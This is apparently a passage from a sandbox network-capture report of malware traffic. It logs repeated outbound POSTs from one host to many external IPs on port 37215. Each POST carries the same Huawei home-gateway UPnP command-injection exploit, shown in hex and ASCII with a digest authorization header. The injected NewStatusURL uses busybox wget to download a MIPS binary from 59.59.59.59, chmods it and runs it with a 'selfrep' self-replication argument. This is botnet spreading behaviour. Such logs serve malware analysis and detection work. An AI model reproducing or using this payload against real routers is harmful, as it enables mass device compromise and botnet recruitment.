                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1592192.168.2.155070441.237.93.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.860482931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1593192.168.2.1556784197.23.170.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.860580921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1594192.168.2.1558254169.123.171.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.860608101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1595192.168.2.154963241.234.236.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.872158051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1596192.168.2.1554860197.108.187.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.872292995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1597192.168.2.155273057.44.179.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.872313976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1598192.168.2.155867277.27.216.2937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.872334957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1599192.168.2.155832441.170.245.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877547026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1600192.168.2.155729841.247.88.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877576113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1601192.168.2.1557216197.122.121.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:09.877595901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
